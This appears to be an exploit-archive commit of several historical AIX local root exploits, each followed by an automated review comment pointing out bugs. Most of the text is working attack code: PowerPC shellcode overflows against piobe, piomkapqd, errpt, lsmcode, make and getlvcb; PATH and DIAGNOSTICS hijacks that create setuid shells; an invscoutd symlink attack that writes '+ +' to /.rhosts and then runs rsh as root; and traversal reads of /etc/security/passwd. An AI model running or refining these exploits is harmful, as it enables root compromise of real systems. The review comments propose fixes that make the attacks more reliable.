"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh\xff"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[4];
int i,align;
printf("copyright LAST STAGE OF DELIRIUM dec 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/piobe for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: shellcode[55]=0x03;align=2; break;
case 42: shellcode[55]=0x02;align=0; break;
case 43: shellcode[55]=0x04;align=0; break;
case 433: shellcode[55]=0x03;align=0; break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]="PIOSTATUSFILE=lsd";
envp[1]=buffer;
envp[2]=&buffer[3500];
envp[3]=0;
b=buffer;
strcpy(b,"PIOVARDIR=");b+=10;
for(i=0;i<align;i++) *b++=' ';
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[3500];
sprintf(b,"xxx=");b+=4;
for(i=0;i<3-align;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
execle("/usr/lib/lpd/piobe","lsd",0,envp);
}
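Review bot: the second environment string, built from `&buffer[3500]` with `sprintf(b,"xxx=");`, the `' '` padding, the NOP sled and the shellcode copy, is never NUL-terminated: the `*b=0;` that closes the `PIOVARDIR=` string has no counterpart after `for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];`, and `buffer` is an uninitialised automatic array, so execle() reads whatever follows the shellcode until it meets a zero byte. Add `*b=0;` before the `execle` call, as the setsenv and piomkapqd versions in this commit do. Separately, the header prose names PIOSTATUSFILE, PIOTITLE and PIOVARDIR, but the envp array sets only `PIOSTATUSFILE=lsd` and `PIOVARDIR=`; either the description or a comment should say which variables the payload actually uses.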

59
exploits/aix/local/20965.sh Executable file
@ -0,0 +1,59 @@
source: https://www.securityfocus.com/bid/2916/info
AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default.
When 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root.
An attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control.
#!/bin/sh
# FileName: x_diagrpt.sh
# Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-23
# Announce: use as your owner risk!
#
# Note :
# It does not work on all versions of tsm command.
# Use this command to test if your version can exploit or not :
# bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat
# diagrpt.cat
# cat %s <--- here ! have the bug !!! can exploit!
#
O_DIR=`/bin/pwd`
cd /tmp ; mkdir .ex$$ ; cd .ex$$
PATH=/tmp/.ex$$:$PATH ; export PATH
/bin/cat >cat<<EOF
#!/bin/ksh -p
cp /bin/ksh ./kfsh
chown root ./kfsh
chmod 777 ./kfsh
chmod u+s ./kfsh
EOF
chmod a+x cat
DIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR
touch /tmp/.ex$$/diagrpt1.dat
/usr/lpp/diagnostics/bin/diagrpt -o 010101
stty echo
stty intr '^C' erase '^H' eof '^D' eol '^@'
if [ -e ./kfsh ] ;then
echo ""
echo "===================="
pwd
ls -l ./kfsh
echo "Exploit ok ! Use this command to get a uid=0 shell :"
echo '/usr/bin/syscall setreuid 0 0 \; execve "/bin/sh" '
./kfsh
else
echo ""
echo "Exploit false !!!!"
fi
cd /tmp ; /bin/rm -Rf /tmp/.ex$$ ;cd $O_DIR
#EOF
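Review bot: the four header lines (`source: ...` through `An attacker can gain root privileges ...`) precede `#!/bin/sh` and carry no `#`, so an interpreter treats them as commands and the shebang is not on line 1; comment them out and move the shebang up, as the rmail script in this commit does. The comment `It does not work on all versions of tsm command.` also names the wrong binary: the `strings /usr/lpp/diagnostics/bin/diagrpt |grep cat` check and the exploit itself both target diagrpt, so the note should say so.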

@ -0,0 +1,85 @@
// source: https://www.securityfocus.com/bid/3238/info
//
// The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group.
//
// 'piomkapqd' contains a locally exploitable stack overrun condition in it's handling of command line parameters.
//
// Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem.
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/pio/etc/piomkapqd #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* this code gives privilages of a printq group. from that point euid=root */
/* can be gained with the use of our aix_piodmgrsu or aix_digest codes */
#define ADRNUM 2000
#define NOPNUM 16000
#define PRINTQ_GID 9
char setregidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel (setregidcode) */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe4" /* lbz r2,-284(r21) */
"\x88\x75\xfe\xe7" /* lbz r3,-281(r21) */
"\x88\x95\xfe\xe6" /* lbz r4,-282(r21) */
"\x3a\xd5\xfe\xe8" /* cal r22,-280(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\x01"
"\x38\x75\xff\x08" /* cal r3,-248(r21) */
"\x38\x95\xff\x10" /* cal r4,-240(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x10" /* st r3,-240(r21) */
"\x92\x95\xff\x14" /* st r20,-236(r21) */
"\x88\x55\xfe\xe5" /* lbz r2,-283(r21) */
"\x9a\x95\xff\x0f" /* stb r20,-241(r21) */
"\x4b\xff\xff\xd8" /* bl (setregidcode+32) */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/pio/etc/piomkapqd for aix 4.2 4.3 PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 42: memcpy(&setregidcode[44],"\xd2\x02",2); break;
case 43: memcpy(&setregidcode[44],"\xe7\x04",2); break;
case 433: memcpy(&setregidcode[44],"\x82\x03",2); break;
default: exit(-1);
}
setregidcode[46]=PRINTQ_GID;
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[3000];
envp[1]=0;
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[3000];
sprintf(b,"xxx=");b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setregidcode);i++) *b++=setregidcode[i];
*b=0;
execle("/usr/lib/lpd/pio/etc/piomkapqd","lsd","-p",buffer,0,envp);
}
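Review bot: the header prose says piomkapqd is owned by the 'printk' group and yields 'printk' privileges, but the code defines `#define PRINTQ_GID 9`, its comment reads `this code gives privilages of a printq group`, and the digest source in this commit likewise speaks of printq; the description should read printq. The usage string accepts `42|43|433` while the banner printed just above it advertises only `aix 4.2 4.3`, so one of the two is out of date. As with the other LSD sources here, there are no `#include` directives and `main` has an implicit return type.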

29
exploits/aix/local/21904.pl Executable file
@ -0,0 +1,29 @@
source: https://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "\x7c\xa5\x2a\x79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$BUFF.="\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79";
$BUFF.="\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$BUFF.="\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04";
$BUFF.="\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10";
$BUFF.="\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
%ENV=(); $ENV{CC}=$BUFF;
exec "/usr/bin/errpt","-T","A"."\x2f\xf2\x2a\x40"x1320;
#EOF
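Review bot: `source: https://www.securityfocus.com/bid/5885/info` and the description sentence after it are bare text ahead of `#!/usr/bin/perl`, so perl tries to compile them (the `source:` label is followed by a URL it cannot parse) and the interpreter line is not first; prefix both with `#`. Note also that the syscall-number bytes `\xb6\x05` and `\xb7\x05`, each placed right after a `\x44\xff\xff\x02` svca, are fixed for the AIX 5.1 the header says it was tested on, whereas the other watercloud scripts in this commit read `/usr/bin/oslevel` to pick the byte; a version check, or at least a comment stating the 5.1-only assumption, would tell a user on another level why it fails.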

49
exploits/aix/local/22756.pl Executable file
@ -0,0 +1,49 @@
source: https://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on Aix4.3.3.Mybe can work on other versions.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use as your owner risk!
$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-6-1 ].\n\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF
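Review bot: `$_=`/usr/bin/oslevel`;` is never read: `$XID` and `$UID` are fixed at `\x03` and `\x97` whatever the output, so the backtick call is dead code, unlike the enq script in this commit where the oslevel string selects the byte. In `sub getshell($XID,$GID) { my $SHELL,($XID,$GID)=@_;` the parenthesised names are taken by perl as a prototype (letters are not legal there and draw a warning), and the assignment binds the package globals `$XID` and `$GID` rather than lexicals, so the helper overwrites the script's own variables on every call; `sub getshell { my ($XID,$GID)=@_; ... }` is what is meant. The same helper is copied into the make and getlvcb scripts below. The two header lines above `#!/usr/bin/perl` also need `#` prefixes.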

57
exploits/aix/local/23838.pl Executable file
@ -0,0 +1,57 @@
source: https://www.securityfocus.com/bid/9903/info
GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler.
Because the GNU make utility is reported to run with setGID root privileges, a local attacker may potentially exploit this condition to gain access to the root group.
This issue is reported to exist on AIX 4.3.3 platforms.
#!/usr/bin/perl
# FileName: x_make_aix433_limited.pl
# Exploit /usr/local/bin/make of Aix4.3.3 to get a gid=0 shell.
# Tested on low version of Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org (EN) / www.xfocus.net (CN)
# Date : 2003-5-30
# Announce: use as your owner risk!
$CMD="/usr/local/bin/make";
$_=`/usr/bin/oslevel`;
$XID="\x03";
@GID_LIST=(248,247);
print "\n\nExploit $CMD for Aix 4.3.3 to get gid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :use this command to get gid=0 after egid=0 :\n";
print "/usr/bin/syscall setregid 0 0 \\; execve '/bin/sh'\n";
$str="k:k.c\n\t\${CC} k.c\n\t";
open mfd,">Makefile" or die "open file Makefile for write error!\n";
open kfd,">k.c" or die "open file .k.c for write error!\n";
print mfd $str, print kfd $str;
close mfd, close kfd;
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
foreach $GID ( @GID_LIST) {
$ENV{CCC}=$NOP.&getshell($XID,chr($GID));
system $CMD ,"CC="."\x2f\xf2\x2b\x40"x300;
}
unlink "Makefile","k.c";
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF
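Review bot: `print mfd $str, print kfd $str;` is a single print whose argument list is `($str, print kfd $str)`: the inner print writes `$str` to k.c and returns 1, and that 1 is then appended to `$str` in the Makefile, whose last recipe line becomes `1`. Split it into `print mfd $str; print kfd $str;` (and, for consistency, `close mfd; close kfd;`). The `$_=`/usr/bin/oslevel`;` result is never used here either, and `@GID_LIST=(248,247)` is not a list of group ids: `chr($GID)` lands in the word right after `\x44\xff\xff\x02`, the position the LSD C sources in this commit patch with the per-oslevel syscall number, so a name such as `@SYSCALL_LIST` would say what is being brute-forced. The four header lines above `#!/usr/bin/perl` need `#` prefixes as well.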

56
exploits/aix/local/23840.pl Executable file
@ -0,0 +1,56 @@
source: https://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
#!/usr/bin/perl
# FileName: x_getlvcb_aix433_limited.pl
# Exploit getlvcb of Aix4.3.3 to get a uid=0 shell from a gid=0.
# Tested : on Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-30
# Announce: use as your owner risk!
$CMD="/usr/sbin/getlvcb";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit,for example ";
print "my another program x_make_433_limited.pl :)\n";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="AA".$NOP.&getshell($XID,$UID);
$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF
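Review bot: inside the retry loops the result of `system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;` is discarded, so `$ret` keeps the value from the first attempt and the `&& $ret` conditions never stop the loops once an offset works; all sixteen combinations run regardless. The lsmcode script in this commit assigns `$ret = system ...` inside the loop; do the same here. The four header lines above `#!/usr/bin/perl` also need `#` prefixes, otherwise perl refuses to compile the file before anything runs.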

177
exploits/aix/local/23841.c Normal file
@ -0,0 +1,177 @@
// source: https://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
/********************************************************************
* Secure Network Operations (http://www.secnetops.com)
* Local AIX getlvcb Exploit
* by: mattox@secnetops.com
* Program Description:
*
* Vulnerability Details:
*
* # gdb -q /usr/sbin/getlvcb
* (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD
* (gdb) r
* Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41424344 in ?? ()
* (gdb) bt
* #0 0x41424344 in ?? ()
* (gdb) i r
* r0 0x6000328e 1610625678
* r1 0x2ff228a0 804399264
* r2 0xf012de88 -267198840
* r3 0x1 1
* r4 0x9 9
* r5 0x2ff22ff8 804401144
* r6 0xd030 53296
* r7 0x0 0
* r8 0x60000000 1610612736
* r9 0x600039ce 1610627534
* r10 0x0 0
* r11 0x6000214a 1610621258
* r12 0x41424344 1094861636
* r13 0x200008b0 536873136
* r14 0x0 0
* r15 0x0 0
* r16 0x0 0
* r17 0x0 0
* r18 0x0 0
* r19 0x0 0
* r20 0x0 0
* r21 0x0 0
* r22 0x0 0
* r23 0x0 0
* r24 0x0 0
* r25 0x0 0
* r26 0x0 0
* r27 0x0 0
* r28 0x41414141 1094795585
* r29 0x41414141 1094795585
* r30 0x41414141 1094795585
* r31 0x41414141 1094795585
* pc 0x41424344 1094861636
* ps 0x4000d030 1073795120
* cr 0x26222444 639771716
* lr 0x41424344 1094861636
* ctr 0x0 0
* xer 0x0 0
* fpscr 0x0 0
* vscr 0x0 0
* vrsave 0x0 0
*
* .............................................................
* $ uname -a
* AIX thunderfoot 1 5 002064864C00
*
* $ whoami
* kinet1k
*
* $ id
* uid=7(kinet1k) gid=1(staff) groups=0(system)
* $ ./r00tme 208 231
*
* Secure Network Operations (written by: mattox@secnetops.com)
* AIX Local getlvncb exploit
*
* Fixin to overwrite the address: 0x2ff2283d
* Using a buffer size of: 208
* And an offset of: 231
*
* # whoami
* root
*
* # id
* uid=0(root) gid=1(staff) groups=0(system)
*..............................................................
*
*********************************************************************/
#include <stdlib.h>
#include <string.h>
#define OFFSET 0
#define BUFFERSIZE 208
#define NOP "\x7c\xa5\x2a\x79"
#define RETURNADDR 0x2ff22924
char shellcode[ ] =
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79"
"\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
int main( int argc, char *argv[ ] )
{
int i;
int offset = OFFSET, bufferSize = BUFFERSIZE;
unsigned long esp, returnAddress, *addressPointer;
char *buffer, *pointer;
/* Usage */
if( argv[ 1 ] ) {
if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) {
printf( "\n\tUsage: %s <buffer size> <offset>\n\n", argv[ 0 ] );
exit( 0 );
}
}
if( argc > 1 ) {
bufferSize = atoi( argv[ 1 ] );
}
if( argc > 2 ) {
offset = atoi( argv[ 2 ] );
}
returnAddress = RETURNADDR - offset;
printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" );
printf( "AIX Local getlvncb exploit\n\n" );
printf( "Fixin to overwrite the address: 0x%x\n", returnAddress );
printf( "Using a buffer size of: %i\n", bufferSize );
printf( "And an offset of: %i\n", offset );
if( !( buffer = malloc( bufferSize ) ) ) {
printf( "Coundn't allocate memory.\n" );
exit( 0 );
}
/* I know, this is weird stuff...had to sub odd number to get ret addy to align */
pointer = buffer - 1;
addressPointer = ( long * )pointer;
for( i = 0; i < bufferSize; i+=4 ) {
*( addressPointer++ ) = returnAddress;
}
for( i = 0; i < ( bufferSize / 2 ); i+=4 ) {
buffer[ i ] = ( unsigned long )NOP;
}
pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) );
for( i = 0; i < strlen( shellcode ); i++ ) {
*( pointer++ ) = shellcode[ i ];
}
buffer[ bufferSize - 1 ] = '\0';
execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 );
free( buffer );
return 0;
}
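Review bot: `buffer[ i ] = ( unsigned long )NOP;` writes no NOP: `NOP` is the string literal `"\x7c\xa5\x2a\x79"`, so the cast turns its address into an integer and the store keeps only the low byte of that pointer in every fourth byte of the first half of the buffer. The sled the comment promises never exists; the first half stays as the return-address fill from the previous loop with one stray pointer byte every four. Use `memcpy( buffer + i, NOP, 4 )`. Two more problems in the same block: `pointer = buffer - 1;` followed by `*( addressPointer++ ) = returnAddress;` for `bufferSize` bytes writes one byte before the malloc() block (the comment admits the alignment hack), and the file does not compile as committed, because the three description lines after `// source: ...` are not commented and `<stdio.h>` and `<unistd.h>` are missing for printf() and execl().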

43
exploits/aix/local/23883.pl Executable file
@ -0,0 +1,43 @@
source: https://www.securityfocus.com/bid/9982/info
Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges.
This issue may allow a malicious user to corrupt arbitrary files on the affected system, potentially leading to a system wide denial of service condition. It has also been conjectured that this issue may be leveraged to allow an attacker to gain escalated privileges, although this is unconfirmed.
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF
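Review bot: `print "Exploit error on kill process invscoutd !!" ,exit 1 if &killproc() == 0;` never prints anything: `exit 1` is part of print's argument list and is evaluated while the list is built, so the process exits before print runs. Write it as `if (&killproc() == 0) { print "..."; exit 1; }`. In `killproc`, `$ret` is a package global that is assigned only when a PID is found, so on the second call, with no invscoutd left running, it returns the stale value from the first call rather than -1; declare `my $ret;` at the top of the sub. The three header lines before `#!/usr/bin/perl` also need `#` prefixes.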

@ -0,0 +1,17 @@
source: https://www.securityfocus.com/bid/12041/info
diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.
A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software.
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
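Review bot: `mkdirhier /tmp/aap/bin` depends on the X11 `mkdirhier` script being installed; `mkdir -p /tmp/aap/bin` does the same with a POSIX utility. The snippet also has no interpreter line and runs the setup, the trigger and the result together, so a comment marking `lsmcode` as the setuid program that honours `DIAGNOSTICS` and runs `bin/Dctrl`, and `/tmp/.shh` as the resulting setuid shell, would make the sequence clear; the description only says "certain diag applications" and never names lsmcode.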

@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/16102/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
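Review bot: `./getCommand.new` is run from the current directory without saying where that binary comes from on a stock install (path or fileset), so a reader cannot tell which component to check for exposure; add it. The two transcript lines also lack a space after the prompt (`-bash-3.00$./getCommand.new`), which makes prompt and command look like one token.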


@ -0,0 +1,11 @@
source: https://www.securityfocus.com/bid/16103/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh
ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$
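Review bot: the transcript is wrapped mid-entry: the `ls -l /tmp/k.sh` output spills its file name onto the next line, and the script body shows `/tmp/log. $$` and a line starting `$$ rm`, which cannot be what the 79-byte `k.sh` contains. Reflow the listing so each command and each line of `k.sh` is intact; as committed, the read-access claim cannot be verified from the output.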

exploits/aix/local/28507.sh Executable file

@ -0,0 +1,65 @@
# Exploit-DB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
